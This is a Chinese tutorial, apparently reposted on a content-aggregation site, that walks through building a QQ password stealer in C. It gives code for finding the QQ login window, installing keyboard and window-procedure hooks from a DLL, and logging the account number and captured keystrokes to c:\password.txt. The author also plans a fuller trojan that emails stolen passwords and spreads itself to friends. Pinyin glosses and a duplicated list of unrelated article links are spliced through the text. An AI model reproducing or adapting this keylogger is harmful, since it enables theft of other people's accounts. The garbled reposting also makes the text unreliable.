蚁人1

时间：2024/9/20 05:26:00人气：0次作者：佚名我要评论(0)

近天气太热，外加无聊，出于练习的目的，想【xiǎng】到了写个盗QQ的软件，说“盗”，未免是【shì】太难听了吧，于【yú】是我给它起名为“UiQQ道”.

　　一【yī】般的盗密码的软件的软件都是通过监视键盘来获得【dé】密码，这样操作比较方便，但是这样【yàng】也【yě】存在一定问题，密【mì】码有的时候不是很准确，因为有的人输入密码并不是从前到后输入，当然这样的人也是【shì】少【shǎo】数，盗密【mì】码嘛，当然去得到那些比较粗心的人的密码！通过安装钩子来监视QQ登陆界面就是获得密码【mǎ】的方法，在安【ān】装前得先找到登【dēng】陆窗口的句柄，当钩子安装后【hòu】，记录键盘，当用户“回车”或是点了“登陆”就可以开始处理密码了！我准备【bèi】分【fèn】为四部分来说明这个整个过程：

　　（1）寻找QQ登陆界面。

　　（2）安装钩子

　　（3）钩子函数的解释.

　　（4）处理密码。

　　以下部分全是使用C语言，文章中我假设读者您【nín】是会C/SDK编程的。如【rú】果遇到相关的概念性问题【tí】，您可以查看MSDN或是上BBS 询问！

　　第一部分：（1）寻找QQ登陆界面。

　　软件运行后，利用安装定时器，每秒在系统找QQ登陆界面【miàn】，这样基本上只要用户打开了QQ登陆界面就会被抓住【zhù】其句柄，看下【xià】面代码：

　　#define ID_MYTIMER 555

　　SetTimer(hDlg, ID_MYTIMER, 1000, NULL);

　　安装好TIMER后，下面是处理主程序的WM_TIMER消息，凡是出现【xiàn】没有定义的变【biàn】量，您可以【yǐ】理解为是全局变量.

　　//处理WM_TIMER代码

　　if (!IsWindow(g_hQQLogin)) //判断g_hQQLogin是否是有效的窗口【kǒu】句柄

　　{

　　HWND hLogin=NULL;

　　g_hQQLogin = NULL;

　　SetQQHook(NULL); //参数为NULL是卸载HOOK，参数为【wéi】句柄是安装句柄【bǐng】

　　do

　　 {

　　//利用【yòng】FindWindowEx查找QQ登陆窗口【kǒu】，具体参数意思请查MSDN

　　g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //对话框的类都是#32770

　　//找到类【lèi】名是#32770后，再在其窗【chuāng】体内找一个具有“ 登录QQ”的BUTTON按纽

　　hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登录QQ"); //这一句【jù】很关键，如果你的【de】QQ登陆窗口上没有【yǒu】" 登录QQ"字样，那么获取密码将失败【bài】！

　　}

　　while(g_hQQLogin != NULL && hLogin == NULL); //直到找【zhǎo】到指定的窗口，即：QQ登陆窗口

　　if (g_hQQLogin != NULL)

　　{

　　SetQQHook(g_hQQLogin);//安装HOOK，此函数在DLL文件中第【dì】二部分中介绍

　　}

　　 }

　　上【shàng】面就【jiù】是查找QQ登陆窗口句柄的过程，从代码可以看出我用的【de】方法：找一个其子窗体中有一个标题为【wéi】“ 登录QQ”的BUTTON的对话框（这句话说得有点【diǎn】饶口，这【zhè】句话如果也看不懂，下面您不用看了【le】：（）我最开始是想利用【yòng】 FindWindow(NULL,"QQ用户登陆窗口")来查找，但【dàn】是我用Spy++看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”，而是“乱码”，其中包【bāo】含了【le】回车键等特殊字符，于是我用了FindWindowEx().
第二部分：（2）安装钩子

　　找到了QQ登陆窗口后，就成功了一半。：）

　　下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么【me】要用DLL（动态连【lián】接库）？要【yào】去“钩”其他进程的消息，得让HOOK函数在DLL中，这样好映射【shè】到其地址空间中！

　　BOOL WINAPI SetQQHook(HWND hQQLogin)

　　{

　　//获得登陆框的句柄

　　BOOL bRet = FALSE;

　　if (hQQLogin != NULL)

　　 {

　　DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思？看MSDN

　　g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ，此处不一样！得到QQ号的子窗口句柄

　　g_hPsw = GetDlgItem(hQQLogin, 180); //不【bú】同版【bǎn】本QQ，此处不一样！得到QQ密码的子【zǐ】窗口句柄

　　if (g_hNum == NULL)

　　{

　　MessageBox(NULL,"哭了，号码【mǎ】句柄都【dōu】没有得到！","郁闷",0);

　　return FALSE;

　　}

　　if(g_hPsw==NULL)

　　{

　　MessageBox(NULL,"哭了，密码句柄都没有得到！","郁闷【mèn】",0);

　　return FALSE;

　　}

　　分别键盘HOOK，和界面部分消息处理的HOOK

　　g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);

　　g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);

　　bRet = (g_hProc != NULL) && (g_hKey != NULL);

　　}

　　else

　　{

　　// 卸载钩子

　　bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);

　　g_hProc = NULL;

　　g_hKey = NULL;

　　g_hNum = NULL;

　　}

　　return bRet;

　　}

　　上面是安装HOOK部分的代码，就这么简单，上面提到了CallWndProc，KeyboardProc是两【liǎng】个回调【diào】函数，是我第三部分要【yào】解释的钩子函
・三种常用的网络协议简述・突破ip封锁登陆论坛系统
・抵【dǐ】御艾滋【zī】：女大学生示范用安全套・Windows各系列启动速度差异的奥【ào】秘
・带你【nǐ】逃离虚拟内存的设置误区・在IE属性中合【hé】理设置Cookies
・宠我爱我照顾我 QQ宠物完全攻略・六大网络电子相册服务横向评测
・PHOTOSHOP制作【zuò】一块绝美的【de】手【shǒu】表・网络游戏开发人才培训渐成热点

・三种常用的网络协议简述・突破ip封锁登陆论坛系统
・抵御艾滋：女大【dà】学生示范用安全套・Windows各系列启动速度差异【yì】的奥秘
・带【dài】你逃离虚拟内存的设置误区・在IE属性中合理设【shè】置Cookies
・宠我爱我照顾我 QQ宠物完全攻略・六【liù】大网【wǎng】络电子相册服【fú】务横向评测
・PHOTOSHOP制作一【yī】块绝美的手表・网络游戏开发人才培【péi】训渐成热【rè】点

　　第三部分：（3）钩子函数的解释

　　CallWndProc，KeyboardProc是两个回调【diào】函数的原【yuán】型和具体代码如下：

　　// 钩子过程，监视“登陆”的命令消息

　　LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)

　　{

　　CWPSTRUCT *p = (CWPSTRUCT *)lParam;

　　// 捕获“登陆”按钮

　　if (p->message == WM_COMMAND && p->wParam ==16032)

　　//下面个函数【shù】是我在第四【sì】部分介绍-“处理密【mì】码”部分会仔细说明

　　//当用【yòng】户点了登陆按钮，说【shuō】明QQ号码和QQ密码已经填写完毕，当然【rán】可以【yǐ】去获得密码了

　　 GetPasswrod();

　　 return CallNextHookEx(g_hProc, nCode, wParam, lParam);

　　}

　　 // 键盘钩子过程，监视“登陆”的热键消息

　　 LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)

　　 {

　　// 捕获热键【jiàn】消息，记录【lù】键盘的按键盘过程,pmsg是PMSG类型的，i是全【quán】局Static类型的

　　 pmsg.wParam =wParam;

　　i++;

　　if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆，用户用了回【huí】车后，就【jiù】可以可以去获【huò】得密码了

　　GetPasswrod();

　　return CallNextHookEx(g_hKey, nCode, wParam, lParam);

　　}

　　在明白了这两个钩子函数后就可以看后期是【shì】如何【hé】具体处理密码的了，这就是下面的第四部分【fèn】内容
第四部分：（4）处理密码

　　如果您读【dú】到了【le】此处，我想得暂停一会，先让我【wǒ】来帮你回【huí】忆一下前面提到的几个关键的变量

　　第一个：QQ号的子窗口句柄 g_hNum

　　第二个：QQ密【mì】码的子窗【chuāng】口句柄 g_hPsw //此【cǐ】部分暂时不使用，下面

　　第三个：存键盘按键的 pmsg

　　上面三【sān】变量分别出现在第二部分和第三部分，都是全局共享【xiǎng】（shared）变【biàn】量

　　QQ密码的子窗口句柄 g_hPsw 此部【bù】分暂时不使用，你可以看到下面代码【mǎ】中有【yǒu】句用到g_hPsw的语【yǔ】句是我注释掉了【le】的，原因是无法通过那样去得到QQ密码，得处理按键消息

　　void GetPasswrod()

　　{

　　//声明变量和初始化

　　HANDLE f;

　　TCHAR num[13];

　　TCHAR psw[21];

　　TCHAR total[50];

　　int j;

　　memset(num,0,sizeof(num));

　　memset(total,0,sizeof(total));

　　memset(psw,0,sizeof(psw));

　　DWORD dw;

　　//得到QQ号的内容，以为有的人的QQ号是在【zài】登陆框有记【jì】录，其QQ号并是用键盘输入的

　　GetWindowText(g_hNum,(LPSTR)num,sizeof(num));

　　//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用，无法这样获得【dé】密码

　　//提取出键盘记录【lù】,此内容也许全是密码，也许【xǔ】是【shì】QQ号+QQ密码

　　for(j=0;j<20;j++)

　　{

　　psw[j]=(TCHAR)pmsg[j*2].wParam ;

　　}

　　psw[j+1]='\0';

　　//把QQ号码和QQ密【mì】码写入C盘【pán】password.txt中

　　f=CreateFile("c:\\password.txt",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

　　strcat(total,"号码");

　　strcat(total,num);

　　strcat(total,"密码:");

　　strcat(total,psw);

　　WriteFile(f,&total,sizeof(total),&dw,NULL);

　　CloseHandle(f);

　　}

　　最后在C盘password.txt也许【xǔ】会出现这样两种情【qíng】况：

　　1）当QQ号是没有用输入，而已用的粘贴或者是电脑以前【qián】有记录则是：号码：21728812密码：TEST

　　2) 当QQ号是用的键盘输入，电脑没有QQ号记录时则是：号码：21728812密码：21728812TEST

　　可以看出，第2种情况【kuàng】把QQ当成了密码【mǎ】了，所以密码还得减去QQ号，

　　特别说明：我这样直接处【chù】理wParam参数，得到的字符密码全是大写的，具体大小写【xiě】问题我没有【yǒu】就【jiù】没有仔细去处理的【de】，功能实现就行了，毕竟我【wǒ】使用他不用来盗密码的！

　　上面【miàn】四部分基本上【shàng】获得密码的功能介绍完毕。凡是没有介绍的【de】变量皆是全局变量，没有提到的函【hán】数如：GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile()等皆是Windows API，详细使用说明请查MSDN（http://www.msdn.com),我提到的“HOOK”，“钩子”是同【tóng】一个意思，也许有的地方我说的钩子函数，而【ér】另外一个地方说的【de】是HOOK函数

　　特别说明：上面有具体的运行文件，由于小弟并没有考虑到更多细节【jiē】，我只是用了“理想”状况下去获得密码，并且或【huò】的密码后并没有【yǒu】注重后期密码处理，也许【xǔ】出现密码大小写不符合或是无法得到密码，请大【dà】家千万别笑话，我写这篇菜鸟级别的Blog的原因意在告诉一些对【duì】这方面感【gǎn】到疑惑的朋友基本的原理，和希望和大侠们【men】交流！

　　后期如果有必要的话，我准备进行【háng】改版，按照“真正”的QQ“木马”来写，如：对QQ版本进行识别，密码自动发送到E-MAIL,加入QQ尾巴【bā】代码，使其自动传给【gěi】好友的等【děng】功能【néng】！请关注我的主页 http://www.uisoft.net

　　转载者，希望您能保留作者【zhě】姓【xìng】名，已经相关连接信息【xī】，我在此感谢

　　注意：我使用的QQ2005 贺岁版【bǎn】版本号：13.5.0.8213，其他版本【běn】的QQ我无法保证可以正确的【de】到密码！

　　参考资料：MSDN，Titilima的QQ尾巴病【bìng】毒模拟代码

蚁人1

相关文章

猜你喜欢

网友评论

热门评论

最新评论

已有0人参与，点击查看更多精彩评论

推荐文章

最新文章

文章排行